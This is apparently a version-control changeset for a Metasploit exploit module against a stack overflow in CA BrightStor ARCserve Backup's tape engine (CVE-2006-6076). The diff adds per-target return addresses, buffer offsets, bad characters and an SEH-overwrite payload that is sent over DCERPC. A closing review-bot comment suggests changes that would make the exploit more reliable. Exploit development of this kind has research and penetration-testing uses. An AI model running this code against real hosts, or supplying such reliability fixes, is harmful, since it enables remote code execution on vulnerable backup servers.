Changeset 5476
- Timestamp:
- 04/16/08 08:08:11 (4 weeks ago)
- Files:
framework3/trunk/modules/exploits/windows/brightstor/tape_engine.rb
r4419 r5476 1 1 ## 2 # $Id :$2 # $Id$ 3 3 ## 4 4 … … 25 25 'Description' => %q{ 26 26 This module exploits a stack overflow in Computer Associates BrightStor ARCserve Backup 27 11.5. By sending a specially crafted DCERPC request, an attacker could overflow the28 buffer and execute arbitrary code.27 r11.1 - r11.5. By sending a specially crafted DCERPC request, an attacker could overflow 28 the buffer and execute arbitrary code. 29 29 }, 30 'Author' => [ 'MC' ],30 'Author' => [ 'MC', 'patrick' ], 31 31 'License' => MSF_LICENSE, 32 32 'Version' => '$Revision$', … … 35 35 [ 'CVE', '2006-6076' ], 36 36 [ 'BID', '21221' ], 37 [ 'OSVDB', '30637' ], 38 [ 'URL', 'http://www.milw0rm.com/exploits/3086' ], 39 [ 'URL', 'http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=101317' ], 37 40 ], 38 41 'Privileged' => true, … … 45 48 'Space' => 500, 46 49 'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e", 47 'StackAdjustment' => - 3500,50 'StackAdjustment' => -9500, 48 51 }, 49 52 'Platform' => 'win', 50 53 'Targets' => 51 54 [ 52 [ 'BrightStor ARCserve r11.5', { 'Ret' => 0x2380ceb5 } ], 53 ], 55 [ 'BrightStor ARCserve r11.1', { 'Ret' => 0x2380cdc7, 'Offset' => 1158 } ], #p/p/r cheyprod.dll 07/21/2004 56 [ 'BrightStor ARCserve r11.5', { 'Ret' => 0x2380ceb5, 'Offset' => 1132 } ], #p/p/r cheyprod.dll ??/??/???? 
57 ], 54 58 'DisclosureDate' => 'Nov 21 2006', 55 'DefaultTarget' => 0))59 'DefaultTarget' => 1)) 56 60 57 register_options([ Opt::RPORT(6502) ], self.class) 61 register_options([ Opt::RPORT(6502) ], self.class) 58 62 end 59 63 60 64 def exploit 61 65 connect 62 66 63 67 handle = dcerpc_handle('62b93df0-8b02-11ce-876c-00805f842837', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']]) 64 68 print_status("Binding to #{handle} ...") … … 71 75 72 76 dcerpc.call(43, request) 73 74 filler = "\x10\x09\xf9\x77" + rand_text_english( 1132)77 78 filler = "\x10\x09\xf9\x77" + rand_text_english(target['Offset']) 75 79 seh = generate_seh_payload(target.ret) 76 80 sploit = filler + seh 77 81 78 82 print_status("Trying target #{target.name}...") 79 83 80 84 begin 81 85 dcerpc_call(38, sploit) … … 88 92 89 93 end 90 end 94 end
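Review bot: The `filler` line in `exploit` now takes its length from `target['Offset']`, but the 4-byte prefix `"\x10\x09\xf9\x77"` in front of it stays hard-coded; read little-endian that is 0x77f90910, which looks like an absolute address in a system DLL (not confirmed from the hunk), and if so it is OS/service-pack dependent in a way the new per-target `Ret`/`Offset` values are not. I would move it next to them, e.g. `'Prefix' => "\x10\x09\xf9\x77"` in each target hash and `filler = target['Prefix'] + rand_text_english(target['Offset'])`, or at minimum add a comment stating what the pointer is and which image/version it was taken from. The new r11.5 target is annotated `#p/p/r cheyprod.dll ??/??/????` while the r11.1 entry carries a real build date; the placeholder should be filled in or dropped, since that date is what lets the next maintainer verify `0x2380ceb5` against the right DLL. Also worth confirming that the module-level `rand_text_english` helper defaults its bad-character argument to the payload's `BadChars`; if it does not, the filler can contain `\x2e`, `\x2f`, `\x5c` or `\x5f` and the module should pass `payload_badchars` explicitly. The `begin` around `dcerpc_call(38, sploit)` and its `rescue` end outside the hunk.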
